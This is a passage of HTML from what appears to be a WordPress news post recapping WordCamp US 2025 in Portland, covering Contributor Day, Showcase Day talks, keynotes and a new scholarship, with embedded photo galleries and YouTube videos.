data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19086\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z633226-1.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19086\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z633226-1-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633226-1-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633226-1-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633226-1-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633226-1-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693a436&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693a436\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19090\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z633121.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19090\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z633121-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633121-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633121-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633121-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633121-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693a6df&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693a6df\" class=\"wp-block-image size-large wp-lightbox-container\"><img loading=\"lazy\" decoding=\"async\" width=\"2560\" height=\"1707\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19089\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?fit=1024%2C683&amp;ssl=1\" alt=\"\" class=\"wp-image-19089\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8723-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693a9b9&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693a9b9\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19092\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8841.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19092\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8841-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8841-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8841-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8841-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8841-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693ac8a&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693ac8a\" class=\"wp-block-image size-large wp-lightbox-container\"><img loading=\"lazy\" decoding=\"async\" width=\"2560\" height=\"1707\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19088\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?fit=1024%2C683&amp;ssl=1\" alt=\"\" class=\"wp-image-19088\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8753-1-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693af53&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693af53\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19091\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8827.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19091\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8827-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8827-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8827-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8827-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8827-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693b205&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693b205\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19083\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8887-2.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19083\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8887-2-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8887-2-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8887-2-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8887-2-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8887-2-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n</figure>\n\n\n\n<p>The mix of experience in the room made this year especially notable. First-time contributors were paired with seasoned table leads who guided them through their first steps into open source contribution. Longtime contributors reconnected with their teams and advanced ongoing initiatives, while new voices added fresh perspectives and momentum. The spirit of mentorship was woven throughout, ensuring that Contributor Day was productive and welcoming.</p>\n\n\n\n<p>The results spoke for themselves:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Polyglots</strong> translated more than 12,000 strings, expanding WordPress’s accessibility worldwide.</li>\n\n\n\n<li>The <strong>Community team</strong> celebrated the approval of two brand-new local meetups.</li>\n\n\n\n<li>The <strong>Training team</strong> achieved its objective of updating outdated course thumbnails.</li>\n\n\n\n<li>The <strong>Core team</strong> worked through a live bug scrub, with 9 committers and 16 contributors collaborating on improvements.</li>\n\n\n\n<li>The <strong>Documentation team</strong> completed numerous content updates to keep resources fresh and reliable.</li>\n</ul>\n\n\n\n<p>Momentum carried through every table, with participants reporting measurable progress and a renewed sense of shared purpose. Contributor Day once again highlighted the unique power of collaboration in shaping the open web, proving that every contribution matters through code, translations, training, or community building.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Showcase Day: WordPress in Action</h2>\n\n\n\n<p>Wednesday, August 27, was the popular Showcase Day, spotlighting real-world innovation in WordPress. Initially expected to draw about 250 participants, Showcase Day welcomed more than 800 attendees — a powerful sign of how much energy and curiosity the community brought to Portland. The sessions demonstrated how WordPress powers meaningful work across industries from nonprofits to newsrooms, agencies to global enterprises, while staying true to open source values.</p>\n\n\n\n<p>The day opened with a keynote by Amy Sample Ward: <em>The Tech That Comes Next</em>. Drawing from their co-authored book with Afua Bruce, Amy highlighted the inequities embedded in today’s technologies — from dataset bias to accessibility gaps — and challenged attendees to rethink how tools are funded, built, and deployed. Their talk invited technologists, funders, and community leaders to imagine a more equitable digital future, rooted in collaboration and shared responsibility.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"WordCamp US 2025 - Amy Sample Ward &quot;The Tech That Comes Next&quot;\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/RKnM75GFZxw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>\n</div></figure>\n\n\n\n<p>From there, <a href=\"https://youtu.be/PGvh7fCOUk0\">Joeleen Kennedy</a> of Human Made shared how Full Site Editing (FSE) shapes the refresh of Wikimedia’s ongoing user experience. Her session <em>Modernizing at Scale</em> detailed how FSE is simplifying workflows, improving accessibility, and making the multilingual platform more sustainable for the long term. Attendees gained a behind-the-scenes look at how one of the world’s largest open knowledge platforms is leveraging WordPress innovation.</p>\n\n\n\n<p><a href=\"https://youtu.be/F4NEPcwGRCI\">Josh Bryant</a> took the stage to explore what happens when Gutenberg leaves the WP-Admin dashboard. His talk, <em>Reimagining WordPress Editing</em>, walked through embedding the block editor into a standalone React application to support Dow Jones’s newsroom workflows. From decoupling Gutenberg to managing custom data stores, the session showcased advanced techniques for scaling editorial tools while maintaining the flexibility of the WordPress ecosystem.</p>\n\n\n\n<p>Hands-on learning was a hallmark of Showcase Day, with Jamie Marsland’s workshop leading participants through building and launching their own professional portfolio sites — no coding required. Attendees left with a fully functioning site, demonstrating WordPress’s continued ability to empower anyone, anywhere, to publish online.</p>\n\n\n\n<p>In the afternoon, Jeffrey Paul’s session <em>Scalable, Ethical AI</em> addressed one of the most pressing topics in today’s digital world: how to integrate AI without sacrificing ownership, privacy, or open standards. Walking participants through practical use cases with ClassifAI and local LLMs, Paul emphasized how WordPress can help content creators harness AI while maintaining autonomy over their data.</p>\n\n\n\n<p>The day closed with a forward-looking community highlight: <a href=\"https://events.wordpress.org/campusconnect/\">WordPress Campus Connect</a>. Panelists <a href=\"https://youtu.be/ARqM9U0ESvo\">Destiny Kanno, Andrés Parra, Javier Montes de Blas, Mauricio Barrantes, and Elineth Morera Campos</a> shared how this initiative brings WordPress into classrooms and universities worldwide. Student Andrés Parra received a scholarship to attend WordCamp. During the panel, Elineth also announced that Fidélitas University will begin offering its students a <a href=\"https://wordpress.org/news/2025/07/introducing-wordpress-credits-a-new-contribution-internship-program-for-university-students/\">WordPress Credits</a> program starting in October 2025, making it a mandatory addition sometime in 2026, enabling them to contribute directly to WordPress as part of their studies.</p>\n\n\n\n<p>By connecting students and educators with the open web, Campus Connect is building the next generation of contributors and innovators, ensuring that WordPress remains both a learning tool and a pathway to opportunity.</p>\n\n\n\n<p>Taken together, Showcase Day affirmed that WordPress is more than just a CMS — it is a platform for equitable technology, global collaboration, cutting-edge enterprise solutions, and the future of digital education. WordPress has the power to be both a platform and a community tool for education, equity, and innovation.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Presentation Days: Learning, Inspiration, and Connection</h2>\n\n\n\n<p>The first full day of sessions at WordCamp US 2025 opened with warm remarks from the organizing team, who reminded attendees: <em>“The most important thanks goes to all of you. The mix of new energy and veteran experience is what makes WordCamp so special, so thank you for being here.”</em> That spirit of gratitude and community carried throughout the event.</p>\n\n\n\n<p>The Sponsor Hall became a hub of activity, complete with raffles, the return of Career Corner, and even a Voodoo Donut Truck parked outside. Attendees lined up to test their luck at a claw machine stuffed with plush Wapuus, while others sought guidance at the Happiness Bar — a hands-on help desk for WordPress questions big and small. Between these activities, the steady buzz of conversations made it clear: the “hallway track” remained one of WordCamp’s most valuable experiences.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"WordCamp US - Danny Sullivan &quot;How (and why!) Google Search Keeps Evolving&quot;\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/ZF_sxLdfTbY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>\n</div></figure>\n\n\n\n<p>The program itself set a high bar. Danny Sullivan’s keynote shed light on how search has evolved to meet the needs of new generations, from 24/7 demand and mobile expectations to short-form video and AI. His session gave attendees a deeper understanding of how search intersects with publishing today and sparked conversations about how WordPress can continue adapting in an era where AI shapes discovery and content.</p>\n\n\n\n<p>From there, the schedule unfolded across multiple tracks. The Core AI panel — featuring <a href=\"https://youtu.be/v_0O6dQ4Q4E\">James LePage, Felix Arntz, and Jeffrey Paul</a> — offered a look into how AI tools are woven into WordPress core. Emphasizing ethics, transparency, and user empowerment, the panel painted a roadmap for how WordPress can adopt new technologies without compromising its open-source values.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Programming-Day-1-2.jpg?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-19103\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Programming-Day-1-2.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/Programming-Day-1-2.jpg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/Programming-Day-1-2.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/Programming-Day-1-2.jpg?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/Programming-Day-1-2.jpg?w=1600&amp;ssl=1 1600w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<p>Hands-on learning played a significant role throughout the conference. Ryan Welcher’s interactive <em>Block Developer Cookbook</em> drew a packed room as participants worked through community-selected code recipes built on the latest WordPress APIs. By the end, attendees left with working examples and practical strategies they could bring back to their projects.</p>\n\n\n\n<p>The program also highlighted diverse technical perspectives. <a href=\"https://youtu.be/vBjNqdacbh4\">Jemima Abu’s</a> session, <em>A PHP Developer’s Guide to ReactJS</em>, bridged the gap between classic and modern web development. At the same time, Adam Gazzaley’s keynote, <em>A New Era of Experiential Medicine – AI and the Brain</em>, invited attendees to consider the human side of technology, exploring how digital tools can advance health and well-being.</p>\n\n\n\n<p>The second day of presentations, Friday, August 29, opened with creativity and imagination. <a href=\"https://youtu.be/O7FPiFpRI3o\">John Maeda’s</a> keynote, <em>Cozy AI Cooking: WordCamp Edition</em>, used the metaphor of a kitchen to demystify AI, blending storytelling with technical insight to show how curiosity and care can guide builders in integrating AI into their work.</p>\n\n\n\n<p>Later in the day, <a href=\"https://youtu.be/ORnJTpjA-4w\">Tammie Lister’s</a> <em>The System is the Strategy</em> illustrated how design systems provide structure and scalability for growing WordPress projects. At the same time, Adam Silverstein’s Unlock Developer Superpowers with AI showcased new ways developers can use emerging tools to speed up workflows and problem-solving.</p>\n\n\n\n<p>Community stories also took center stage. In Creators around a Campfire, Anne McCarthy, Jamie Marsland, Christian Taylor, Mark Szymanski, and Michael Cunningham reflected on how YouTubers and content creators shape the WordPress ecosystem. Their session highlighted the role of storytelling and education in expanding WordPress’s reach to new audiences worldwide.</p>\n\n\n\n<p>The Sponsor Hall remained lively between sessions — with attendees meeting companies, testing demos, and swapping ideas that extended far beyond the conference halls. They also shared moments together at the arcade built for the event and added smiles, hugs, and laughter, which underscored the atmosphere: WordCamp US was as much about connection as code.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Together Into the Future</h2>\n\n\n\n<p>As the event drew to a close, WordPress Cofounder Matt Mullenweg took the stage to share the current state of WordPress and a vision for its future. He highlighted the growth in social media for WordPress with 124,726 new followers since last WCUS — and the WordPress.org website growing over 10% in users along with almost 20% in new users. </p>\n\n\n\n<p>Matt also spotlighted community initiatives shaping the future of open source education and diversity: WordPress Campus Connect, which has already reached 570 students across 11 events. Combined with the growth in overall events (77) which is a 32.76% increase over 2024. Each effort reinforced the message that WordPress is more than software; it is a global movement driven by people.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"WordCamp US 2025 - Ma.tt Mullenweg &quot;Keynote Address &amp; Q&amp;A&quot;\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/45HRzzc0waU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>\n</div></figure>\n\n\n\n<p>He concluded with a live Q&amp;A, fielding questions from the audience on the direction of WordPress, its role in an AI-driven web, and the importance of keeping the project open, inclusive, and adaptable. The final notes of the keynote carried into a closing party in downtown Portland, where attendees capped off the week with music, conversation, and the unmistakable joy of a community coming together.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Closing</h2>\n\n\n\n<p>WordCamp US 2025 once again demonstrated what makes the WordPress ecosystem extraordinary: a community committed to building tools, resources, and opportunities that empower people everywhere.</p>\n\n\n\n<p>This year also marked the debut of the <a href=\"https://airtable.com/appWF6hdXuEOFQMvV/shrV5RZIv0aJjjU00\">Open Horizons Scholarship</a>, which funded six recipients — two organizers, three volunteers, and one speaker — from five countries. A total of $14,670 supported their journeys to WCUS. The scholarship, which also supports participation at WordCamp Asia and WordCamp Europe, is designed to make flagship events more accessible to contributors worldwide.</p>\n\n\n\n<p>A heartfelt thank you goes to the organizers, volunteers, sponsors, and speakers who brought the Portland edition to life — and to every attendee who joined us in person or followed along online. We hope you leave with fresh ideas, meaningful connections, and renewed energy to help shape the future of the open web.</p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped has-black-background-color has-background wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\" style=\"border-width:20px\">\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693bc74&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693bc74\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19112\" 